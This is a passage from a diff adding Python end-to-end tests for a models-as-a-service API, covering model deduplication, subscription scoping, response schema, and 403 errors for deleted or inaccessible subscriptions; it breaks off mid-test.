+ """ + log.info("Test 6: Same modelRef twice should deduplicate (INTENDED behavior)") + + sa_name = "e2e-models-dedup-sa" + sa_ns = "default" + maas_ns = _ns() + subscription_name = "e2e-dedup-subscription" + auth_policy_name = "e2e-dedup-auth" + api_key = None + + try: + # Create SA with its own token + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create auth policy that grants access to the model + log.info(f"Creating auth policy with access to {MODEL_REF}") + auth_policy_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSAuthPolicy", + "metadata": { + "name": auth_policy_name, + "namespace": maas_ns, + }, + "spec": { + "modelRefs": [{"name": MODEL_REF, "namespace": MODEL_NAMESPACE}], + "subjects": { + "users": [sa_user], + "groups": [], + }, + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(auth_policy_cr), + text=True, + check=True, + ) + + # Create subscription with the SAME model ref TWICE (guaranteed duplicates) + log.info(f"Creating subscription with {MODEL_REF} listed twice (to test deduplication)") + subscription_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": { + "name": subscription_name, + "namespace": maas_ns, + }, + "spec": { + "owner": { + "users": [sa_user], + "groups": [], + }, + "modelRefs": [ + { + "name": MODEL_REF, + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 100, "window": "1m"}], + }, + { + "name": MODEL_REF, # Same model ref again - guarantees duplicate + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 200, "window": "1m"}], + }, + ], + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(subscription_cr), + text=True, + check=True, + ) + + # Create API key bound to our test subscription + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", 
"Content-Type": "application/json"}, + json={"name": "e2e-dedup-test-key", "subscription": subscription_name}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + # Wait for reconciliation + _wait_reconcile() + + # Query /v1/models with our custom subscription + log.info(f"Querying /v1/models with subscription: {subscription_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + + # Models should be a list + assert isinstance(models, list), "Models should be a list" + + # Get model IDs from response + model_ids = [m["id"] for m in models] + unique_ids = set(model_ids) + + log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)") + log.info(f" Model IDs: {model_ids}") + log.info(f" Unique IDs: {unique_ids}") + + # Should all be the same model ID (we only referenced one modelRef) + assert len(unique_ids) == 1, \ + f"Expected only 1 unique model ID (same modelRef listed twice), got {len(unique_ids)}: {unique_ids}" + + # INTENDED BEHAVIOR: Should return exactly 1 entry (deduplicated) + # even though the same modelRef was listed twice + assert len(models) == 1, \ + f"Expected 1 deduplicated entry (same modelRef listed 2x), got {len(models)} duplicates: {model_ids}" + + # Validate subscriptions field + model = models[0] + assert "subscriptions" in model, "Model should have 'subscriptions' field" + assert isinstance(model["subscriptions"], list), "subscriptions should be a list" + assert len(model["subscriptions"]) == 1, \ + f"Expected 1 subscription (single subscription requested), got {len(model['subscriptions'])}" + + sub = model["subscriptions"][0] + assert 
"name" in sub, "Subscription should have 'name' field" + assert sub["name"] == subscription_name, \ + f"Expected subscription name '{subscription_name}', got '{sub['name']}'" + # displayName and description are optional + assert isinstance(sub.get("displayName", ""), str), "displayName should be string if present" + assert isinstance(sub.get("description", ""), str), "description should be string if present" + + log.info("✅ API correctly deduplicated same modelRef listed 2x → 1 entry with subscription info") + + finally: + # Cleanup + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_different_modelrefs_same_model_id(self): + """ + Test 7: Different modelRefs serving same model ID return separate entries. + + Uses two DIFFERENT MaaSModelRefs (each listed ONCE) that both serve the + SAME model ID: + - MODEL_REF (facebook-opt-125m-simulated) → serves "facebook/opt-125m" + - PREMIUM_MODEL_REF (premium-simulated-simulated-premium) → serves "facebook/opt-125m" + + The API deduplicates by (model ID, URL). Since these are different backend + services with different URLs, they return as 2 separate entries even though + they serve the same model ID. + + Each entry shows the same model ID but different URL and subscription. 
+ """ + log.info("Test 7: Different modelRefs same ID should deduplicate (INTENDED behavior)") + + sa_name = "e2e-models-diff-refs-sa" + sa_ns = "default" + maas_ns = _ns() + subscription_name = "e2e-diff-refs-subscription" + auth_policy_name = "e2e-diff-refs-auth" + api_key = None + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create auth policy with both modelRefs + log.info(f"Creating auth policy with {MODEL_REF} and {PREMIUM_MODEL_REF}") + auth_policy_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSAuthPolicy", + "metadata": { + "name": auth_policy_name, + "namespace": maas_ns, + }, + "spec": { + "modelRefs": [ + {"name": MODEL_REF, "namespace": MODEL_NAMESPACE}, + {"name": PREMIUM_MODEL_REF, "namespace": MODEL_NAMESPACE}, + ], + "subjects": { + "users": [sa_user], + "groups": [], + }, + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(auth_policy_cr), + text=True, + check=True, + ) + + # Create subscription with both modelRefs (each listed ONCE) + log.info(f"Creating subscription with {MODEL_REF} and {PREMIUM_MODEL_REF}") + subscription_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": { + "name": subscription_name, + "namespace": maas_ns, + }, + "spec": { + "owner": { + "users": [sa_user], + "groups": [], + }, + "modelRefs": [ + { + "name": MODEL_REF, + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 100, "window": "1m"}], + }, + { + "name": PREMIUM_MODEL_REF, + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 200, "window": "1m"}], + }, + ], + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(subscription_cr), + text=True, + check=True, + ) + + # Create API key bound to our test subscription + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", 
"Content-Type": "application/json"}, + json={"name": "e2e-diff-refs-test-key", "subscription": subscription_name}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + # Query /v1/models + log.info(f"Querying /v1/models with subscription: {subscription_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + + assert isinstance(models, list), "Models should be a list" + + # Get model IDs from response + model_ids = [m["id"] for m in models] + unique_ids = set(model_ids) + + log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)") + log.info(f" Model IDs: {model_ids}") + log.info(f" Unique IDs: {unique_ids}") + log.info(" Subscription had: 2 different modelRefs both serving 'facebook/opt-125m'") + + # Both modelRefs serve the same model ID + assert len(unique_ids) == 1, \ + f"Expected only 1 unique model ID (both modelRefs serve facebook/opt-125m), got {len(unique_ids)}: {unique_ids}" + + # Verify it's the expected model ID + expected_id = "facebook/opt-125m" + assert expected_id in unique_ids, \ + f"Expected to find '{expected_id}', but got {unique_ids}" + + # INTENDED BEHAVIOR: Should return 2 entries (deduplication by model ID + URL) + # Different backend services (different URLs) return separate entries even with same model ID + assert len(models) == 2, \ + f"Expected 2 entries (different URLs), got {len(models)}: {model_ids}" + + # Validate both entries have different URLs + urls = [m["url"] for m in models if "url" in m] + assert len(urls) == 2, f"Expected 2 URLs, got {len(urls)}" + assert urls[0] != urls[1], f"Expected different URLs, 
got duplicates: {urls}" + + # Validate each entry has subscriptions field with the same subscription + for model in models: + assert "subscriptions" in model, "Model should have 'subscriptions' field" + assert isinstance(model["subscriptions"], list), "subscriptions should be a list" + assert len(model["subscriptions"]) == 1, \ + f"Expected 1 subscription per model, got {len(model['subscriptions'])}" + assert model["subscriptions"][0]["name"] == subscription_name, \ + f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'" + + log.info("✅ API correctly returned 2 separate entries (different URLs) for same model ID") + + finally: + # Cleanup + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_multiple_distinct_models_in_subscription(self): + """ + Test 8: Multiple distinct models should return exactly 2 entries (1 per unique ID). + + Uses pre-deployed models (both known to not have backend duplication issues): + - DISTINCT_MODEL_REF (simulated-distinct) serving "test/e2e-distinct-model" + - DISTINCT_MODEL_2_REF (simulated-distinct-2) serving "test/e2e-distinct-model-2" + + Creates a subscription with both models. The API should return exactly 2 entries + (one for each distinct model ID), with no duplicates. + + This test validates that when backend models don't have duplication bugs, the + API correctly returns one entry per distinct model ID. 
+ """ + log.info("Test 8: Multiple distinct models should return 2 entries") + + sa_name = "e2e-models-distinct-sa" + sa_ns = "default" + maas_ns = _ns() + subscription_name = "e2e-distinct-models-subscription" + auth_policy_name = "e2e-distinct-models-auth" + api_key = None + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create auth policy with both distinct models + log.info(f"Creating auth policy with {DISTINCT_MODEL_REF} and {DISTINCT_MODEL_2_REF}") + auth_policy_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSAuthPolicy", + "metadata": { + "name": auth_policy_name, + "namespace": maas_ns, + }, + "spec": { + "modelRefs": [ + {"name": DISTINCT_MODEL_REF, "namespace": MODEL_NAMESPACE}, + {"name": DISTINCT_MODEL_2_REF, "namespace": MODEL_NAMESPACE}, + ], + "subjects": { + "users": [sa_user], + "groups": [], + }, + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(auth_policy_cr), + text=True, + check=True, + ) + + # Create subscription with both distinct models + log.info(f"Creating subscription with {DISTINCT_MODEL_REF} and {DISTINCT_MODEL_2_REF}") + subscription_cr = { + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": { + "name": subscription_name, + "namespace": maas_ns, + }, + "spec": { + "owner": { + "users": [sa_user], + "groups": [], + }, + "modelRefs": [ + { + "name": DISTINCT_MODEL_REF, + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 100, "window": "1m"}], + }, + { + "name": DISTINCT_MODEL_2_REF, + "namespace": MODEL_NAMESPACE, + "tokenRateLimits": [{"limit": 100, "window": "1m"}], + }, + ], + }, + } + subprocess.run( + ["kubectl", "apply", "-f", "-"], + input=json.dumps(subscription_cr), + text=True, + check=True, + ) + + # Create API key bound to our test subscription + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + 
headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "e2e-distinct-models-test-key", "subscription": subscription_name}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + # Query /v1/models + log.info(f"Querying /v1/models with subscription: {subscription_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + + assert isinstance(models, list), "Models should be a list" + + # Get model IDs from response + model_ids = [m["id"] for m in models] + unique_ids = set(model_ids) + + log.info(f"📊 API Response: {len(models)} total model(s), {len(unique_ids)} unique ID(s)") + log.info(f" Model IDs: {model_ids}") + log.info(f" Unique IDs: {unique_ids}") + log.info(f" Subscription had: 2 modelRefs ({DISTINCT_MODEL_REF}, {DISTINCT_MODEL_2_REF})") + + # Verify we got BOTH expected model IDs + expected_ids = {DISTINCT_MODEL_ID, DISTINCT_MODEL_2_ID} + assert unique_ids == expected_ids, \ + f"Expected to find both distinct models {expected_ids}, but got {unique_ids}" + + # INTENDED BEHAVIOR: Should return exactly 2 entries (one per distinct model ID) + # No duplicates should be present + assert len(models) == 2, \ + f"Expected 2 entries (one per distinct model ID), got {len(models)}: {model_ids}" + + assert len(model_ids) == len(unique_ids), \ + f"Expected no duplicates, but got {len(model_ids)} entries for {len(unique_ids)} unique IDs: {model_ids}" + + # Validate subscriptions field + for model in models: + assert "subscriptions" in model, f"Model {model['id']} missing 'subscriptions' field" + assert isinstance(model["subscriptions"], 
list), "subscriptions should be a list" + assert len(model["subscriptions"]) == 1, \ + f"Expected 1 subscription, got {len(model['subscriptions'])}" + assert model["subscriptions"][0]["name"] == subscription_name, \ + f"Expected subscription '{subscription_name}', got '{model['subscriptions'][0]['name']}'" + + log.info(f"✅ API correctly returned 2 distinct models without duplicates: {sorted(unique_ids)}") + + finally: + # Cleanup + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_user_token_returns_all_models(self): + """ + Test: User token automatically returns models from all subscriptions. + + Creates a user with access to TWO subscriptions containing different models. + Queries without X-MaaS-Subscription header and validates: + - Returns models from ALL accessible subscriptions + - Each model includes subscriptions array showing which subscription(s) provide access + - Models appearing in multiple subscriptions have aggregated subscription list + """ + log.info("Test: User token returns models from all subscriptions") + + sa_name = "e2e-return-all-sa" + sa_ns = "default" + maas_ns = _ns() + sub1_name = "e2e-return-all-sub1" + sub2_name = "e2e-return-all-sub2" + auth1_name = "e2e-return-all-auth1" + auth2_name = "e2e-return-all-auth2" + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create subscription 1 with DISTINCT_MODEL_REF + log.info(f"Creating subscription 1 with {DISTINCT_MODEL_REF}") + _create_test_auth_policy(auth1_name, DISTINCT_MODEL_REF, users=[sa_user]) + _create_test_subscription(sub1_name, DISTINCT_MODEL_REF, users=[sa_user]) + + # Create subscription 2 with DISTINCT_MODEL_2_REF + log.info(f"Creating subscription 2 with {DISTINCT_MODEL_2_REF}") + _create_test_auth_policy(auth2_name, DISTINCT_MODEL_2_REF, 
users=[sa_user]) + _create_test_subscription(sub2_name, DISTINCT_MODEL_2_REF, users=[sa_user]) + + _wait_reconcile() + + # Query with user token (no X-MaaS-Subscription header) + log.info("Querying /v1/models with user token (no header)") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {sa_token}", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + data = r.json() + models = data.get("data") or [] + + # Should get models from BOTH subscriptions + model_ids = [m["id"] for m in models] + log.info(f"Got {len(models)} models: {model_ids}") + + # Validate we got models from both subscriptions + # (At minimum we should see the 2 distinct models) + assert len(models) >= 2, \ + f"Expected at least 2 models (from 2 subscriptions), got {len(models)}" + + # Validate all models have subscriptions field + for model in models: + assert "subscriptions" in model, f"Model {model['id']} missing 'subscriptions' field" + assert isinstance(model["subscriptions"], list), \ + f"Model {model['id']} subscriptions should be a list" + assert len(model["subscriptions"]) > 0, \ + f"Model {model['id']} should have at least one subscription" + + # Validate subscription structure + for sub in model["subscriptions"]: + assert "name" in sub, "Subscription should have 'name' field" + assert isinstance(sub["name"], str), "Subscription name should be string" + + log.info(f"✅ User token returned {len(models)} models from all subscriptions") + + finally: + _delete_cr("maassubscription", sub1_name, namespace=maas_ns) + _delete_cr("maassubscription", sub2_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth1_name, namespace=maas_ns) + _delete_cr("maasauthpolicy", auth2_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + _wait_reconcile() + + def test_user_token_with_subscription_header_filters(self): + """ + Test: User token with X-MaaS-Subscription header 
filters to that subscription. + + User tokens can optionally provide X-MaaS-Subscription to filter results + to a specific subscription (similar to API key behavior). + + Expected: HTTP 200 with models from only the specified subscription. + """ + log.info("Test: User token with X-MaaS-Subscription header filters models") + + ns = _ns() + auth_policy_name = "e2e-user-token-filter-auth" + subscription_name = "e2e-user-token-filter-sub" + sa_name = "e2e-user-token-filter-sa" + + try: + # Create service account and token + oc_token = _create_sa_token(sa_name, namespace=ns) + sa_user = _sa_to_user(sa_name, namespace=ns) + + # Create test resources + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) + _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user]) + + _wait_reconcile() + + # Query with X-MaaS-Subscription header to filter + log.info(f"Querying /v1/models with X-MaaS-Subscription: {subscription_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {oc_token}", + "X-MaaS-Subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, \ + f"Expected 200 for user token with subscription header, got {r.status_code}: {r.text}" + + data = r.json() + models = data.get("data") or [] + + # Validate models are filtered to the specified subscription + for model in models: + assert "subscriptions" in model, f"Model {model.get('id')} missing 'subscriptions' field" + subscription_names = [s["name"] for s in model["subscriptions"]] + assert subscription_name in subscription_names, \ + f"Model {model.get('id')} should be in subscription {subscription_name}, got {subscription_names}" + + log.info(f"✅ User token with X-MaaS-Subscription filtered to {len(models)} models") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_name, 
namespace=ns) + _wait_reconcile() + + def test_empty_model_list(self): + """ + Test 9: Empty model list should return [] not null. + + Creates a subscription pointing to UNCONFIGURED_MODEL_REF which has no + auth policy. The SA has access to the subscription, but when probing the + model endpoint, Authorino returns 403 (no auth policy = no access). + + This validates that FilterModelsByAccess returns [] (not null) when no + models are accessible. + """ + log.info("Test 9: Empty model list returns empty array") + + sa_name = "e2e-empty-models-sa" + sa_ns = "default" + maas_ns = _ns() + subscription_name = "e2e-empty-models-subscription" + + try: + # Create SA + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + sa_user = _sa_to_user(sa_name, namespace=sa_ns) + + # Create subscription pointing to unconfigured model (has no auth policy) + log.info(f"Creating subscription with {UNCONFIGURED_MODEL_REF} (no auth policy = no access)") + _create_test_subscription(subscription_name, UNCONFIGURED_MODEL_REF, users=[sa_user]) + + # Create API key bound to test subscription + api_key = _create_api_key(sa_token, name=f"{sa_name}-key", subscription=subscription_name) + + _wait_reconcile() + + # Query /v1/models - should return empty list (model has no auth policy) + url = f"{_maas_api_url()}/v1/models" + r = requests.get( + url, + headers={ + "Authorization": f"Bearer {api_key}", + "x-maas-subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + # Should get 200 even with no models + assert r.status_code == 200, f"Expected 200, got {r.status_code}: {r.text}" + + data = r.json() + assert data.get("object") == "list", f"Expected object='list', got {data.get('object')}" + + assert "data" in data, "Response missing 'data' field" + models = data["data"] + + # The critical assertion: data must be an array, never null + assert models is not None, "'data' field must not be null (should be [] for empty)" + + assert isinstance(models, list), \ + f"data 
must be a list, got {type(models).__name__}" + + # Verify it's actually empty (unconfigured model has no auth policy) + assert len(models) == 0, \ + f"Expected empty list (unconfigured model has no auth policy), got {len(models)} models: {models}" + + log.info(f"✅ Empty model list → {r.status_code} with data=[] (array, not null)") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=maas_ns) + _delete_sa(sa_name, namespace=sa_ns) + + def test_response_schema_matches_openapi(self): + """ + Test 10: Response structure matches OpenAPI schema. + + Validates all required fields and types match the API specification. + """ + log.info("Test 10: Response schema matches OpenAPI spec") + + sa_name = "e2e-models-schema-test-sa" + sa_ns = "default" + api_key = None + + try: + # Create SA and API key + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "e2e-schema-test-key"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200 + data = r.json() + + # Validate top-level structure + assert "object" in data, "Response missing 'object' field" + assert data["object"] == "list", f"Expected object='list', got {data['object']}" + assert "data" in data, "Response missing 'data' field" + assert data["data"] is not None, "'data' field must not be null" + + models = data["data"] + assert isinstance(models, list), f"'data' must be an array, got {type(models).__name__}" + + # Validate each model matches schema + for model in models: + # Required fields per OpenAPI spec + assert "id" in model, f"Model 
missing required field 'id': {model}" + assert "object" in model, f"Model missing required field 'object': {model}" + assert "created" in model, f"Model missing required field 'created': {model}" + assert "owned_by" in model, f"Model missing required field 'owned_by': {model}" + assert "ready" in model, f"Model missing required field 'ready': {model}" + + # Validate types + assert isinstance(model["id"], str), f"'id' must be string, got {type(model['id'])}" + assert isinstance(model["object"], str), f"'object' must be string" + assert model["object"] == "model", f"'object' must be 'model', got {model['object']}" + assert isinstance(model["created"], int), f"'created' must be integer" + assert isinstance(model["owned_by"], str), f"'owned_by' must be string" + assert isinstance(model["ready"], bool), f"'ready' must be boolean" + + # Optional fields validation + if "url" in model: + assert isinstance(model["url"], str), "'url' must be string if present" + + log.info(f"✅ Response schema matches OpenAPI → validated {len(models)} model(s)") + + finally: + _delete_sa(sa_name, namespace=sa_ns) + + def test_model_metadata_preserved(self): + """ + Test 11: Model metadata is correctly preserved. + + Validates that url, ready, created, owned_by fields are accurate. 
+ """ + log.info("Test 10: Model metadata preserved") + + sa_name = "e2e-models-metadata-sa" + sa_ns = "default" + api_key = None + + try: + # Create SA and API key + sa_token = _create_sa_token(sa_name, namespace=sa_ns) + + api_key_response = requests.post( + f"{_maas_api_url()}/v1/api-keys", + headers={"Authorization": f"Bearer {sa_token}", "Content-Type": "application/json"}, + json={"name": "e2e-metadata-test-key"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + assert api_key_response.status_code in (200, 201) + api_key = api_key_response.json().get("key") + + _wait_reconcile() + + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={"Authorization": f"Bearer {api_key}"}, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200 + models = r.json().get("data") or [] + + for model in models: + # Verify metadata is present and reasonable + assert model["created"] > 0, f"'created' timestamp should be positive: {model['created']}" + + assert model["owned_by"], f"'owned_by' should not be empty: {model}" + + assert isinstance(model["ready"], bool), f"'ready' must be boolean: {model['ready']}" + + # If URL is present, verify it's well-formed + if "url" in model and model["url"]: + assert model["url"].startswith("http"), \ + f"URL should start with http: {model['url']}" + # URL should contain the model ID + # (though exact format may vary) + + # Verify id is not empty + assert model["id"], f"Model ID should not be empty: {model}" + + log.info(f"✅ Model metadata preserved → validated {len(models)} model(s)") + + finally: + _delete_sa(sa_name, namespace=sa_ns) + + def test_api_key_scoped_to_subscription(self): + """ + Test: API key returns only models from its bound subscription. + + API keys are scoped to a specific subscription at mint time. The gateway + automatically injects X-MaaS-Subscription from the key's subscription. 
+ + Expected: HTTP 200 with models only from the key's subscription, even if + the user has access to multiple subscriptions. + """ + ns = _ns() + auth_policy_name = "e2e-api-key-scoped-auth" + subscription_name = "e2e-api-key-scoped-sub" + sa_name = "e2e-api-key-scoped-sa" + api_key = None + + try: + # Create service account and token + oc_token = _create_sa_token(sa_name, namespace=ns) + sa_user = _sa_to_user(sa_name, namespace=ns) + + # Create test resources + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) + _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user]) + + # Create API key bound to subscription_name + api_key = _create_api_key(oc_token, name=f"{sa_name}-key", subscription=subscription_name) + + _wait_reconcile() + + # Query with API key (no manual headers) + log.info(f"Querying /v1/models with API key bound to {subscription_name}") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + assert r.status_code == 200, \ + f"Expected 200 for API key request, got {r.status_code}: {r.text}" + + data = r.json() + models = data.get("data") or [] + + # Validate models are from the key's subscription + log.info(f"API key returned {len(models)} models") + for model in models: + assert "subscriptions" in model, f"Model {model.get('id')} missing 'subscriptions' field" + subscription_names = [s["name"] for s in model["subscriptions"]] + # Models should be associated with the key's subscription + assert subscription_name in subscription_names, \ + f"Model {model.get('id')} should be in subscription {subscription_name}" + + log.info(f"✅ API key scoped to {subscription_name} returned {len(models)} models") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_name, namespace=ns) + _wait_reconcile() + + def 
test_api_key_with_deleted_subscription_403(self): + """ + Test: API key bound to a subscription that was deleted after key creation. + + This tests an edge case where an API key was minted with a subscription, + but that subscription is later deleted. The gateway injects X-MaaS-Subscription + from the key, but the subscription no longer exists. + + Expected: HTTP 403 with error type: permission_error + """ + ns = _ns() + auth_policy_name = "e2e-api-key-deleted-sub-auth" + subscription_name = "e2e-api-key-deleted-sub" + sa_name = "e2e-api-key-deleted-sub-sa" + api_key = None + + try: + # Create service account and token + oc_token = _create_sa_token(sa_name, namespace=ns) + sa_user = _sa_to_user(sa_name, namespace=ns) + + # Create test resources + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[sa_user]) + _create_test_subscription(subscription_name, MODEL_REF, users=[sa_user]) + + # Create API key bound to subscription + api_key = _create_api_key(oc_token, name=f"{sa_name}-key", subscription=subscription_name) + + _wait_reconcile() + + # Delete the subscription (simulating deletion after key creation) + log.info(f"Deleting subscription {subscription_name} after API key creation") + _delete_cr("maassubscription", subscription_name, namespace=ns) + _wait_reconcile() + + # Query with API key (gateway injects deleted subscription name) + log.info("Querying /v1/models with API key bound to deleted subscription") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {api_key}", + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + # Should return 403 because subscription doesn't exist + assert r.status_code == 403, \ + f"Expected 403 for API key with deleted subscription, got {r.status_code}: {r.text}" + + data = r.json() + assert "error" in data, "Response missing 'error' field" + error = data["error"] + assert error.get("type") == "permission_error", \ + f"Expected error type 'permission_error', got 
{error.get('type')}" + + log.info(f"✅ API key with deleted subscription → {r.status_code} (permission_error)") + + finally: + # subscription_name already deleted + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_name, namespace=ns) + _wait_reconcile() + + def test_api_key_with_inaccessible_subscription_403(self): + """ + Test: API key bound to a subscription the user no longer has access to. + + This tests an edge case where an API key was minted when the user had access + to a subscription, but later the user's group membership changed and they + lost access. The key still has the subscription bound. + + Expected: HTTP 403 with error type: permission_error + """ + ns = _ns() + auth_policy_name = "e2e-api-key-no-access-auth" + subscription_name = "e2e-api-key-no-access-sub" + sa_user = "e2e-api-key-user-sa" + sa_other = "e2e-api-key-other-sa" + + try: + # Create two service accounts + oc_token_user = _create_sa_token(sa_user, namespace=ns) + _ = _create_sa_token(sa_other, namespace=ns) + + user_principal = _sa_to_user(sa_user, namespace=ns) + other_principal = _sa_to_user(sa_other, namespace=ns) + + # Create subscription accessible only to "other" user + _create_test_auth_policy(auth_policy_name, MODEL_REF, users=[user_principal, other_principal]) + _create_test_subscription(subscription_name, MODEL_REF, users=[other_principal]) + + _wait_reconcile() + + # User tries to query with their token but specifying the other user's subscription + # This simulates what would happen if an API key was bound to a subscription + # the user doesn't have access to + log.info("Querying /v1/models with user token and inaccessible subscription") + r = requests.get( + f"{_maas_api_url()}/v1/models", + headers={ + "Authorization": f"Bearer {oc_token_user}", + "X-MaaS-Subscription": subscription_name, + }, + timeout=TIMEOUT, + verify=TLS_VERIFY, + ) + + # Should return 403 because user doesn't have access to the subscription + assert r.status_code == 403, \ 
+ f"Expected 403 for subscription without access, got {r.status_code}: {r.text}" + + data = r.json() + assert "error" in data, "Response missing 'error' field" + error = data["error"] + assert error.get("type") == "permission_error", \ + f"Expected error type 'permission_error', got {error.get('type')}" + + log.info(f"✅ API key/user with inaccessible subscription → {r.status_code} (permission_error)") + + finally: + _delete_cr("maassubscription", subscription_name, namespace=ns) + _delete_cr("maasauthpolicy", auth_policy_name, namespace=ns) + _delete_sa(sa_user, namespace=ns) + _delete_sa(sa_other, namespace=ns) + _wait_reconcile() + + def test_invalid_subscription_header_403(self): + """ + Test: User with valid subscriptions but providing an invalid/non-existent + subscription in the header gets 403. + + Expected: HTTP 403 with error type: permission_error and message: + "requested subscription not found". + """ + ns = _ns() + auth_policy_name = "e2e-models-invalid-sub-auth" + subscription_name = "e2e-models-valid-sub" + sa_name = "e2e-models-invalid-sub-sa" + + try: + # Create service account and get OC token for maas-api + oc_token = 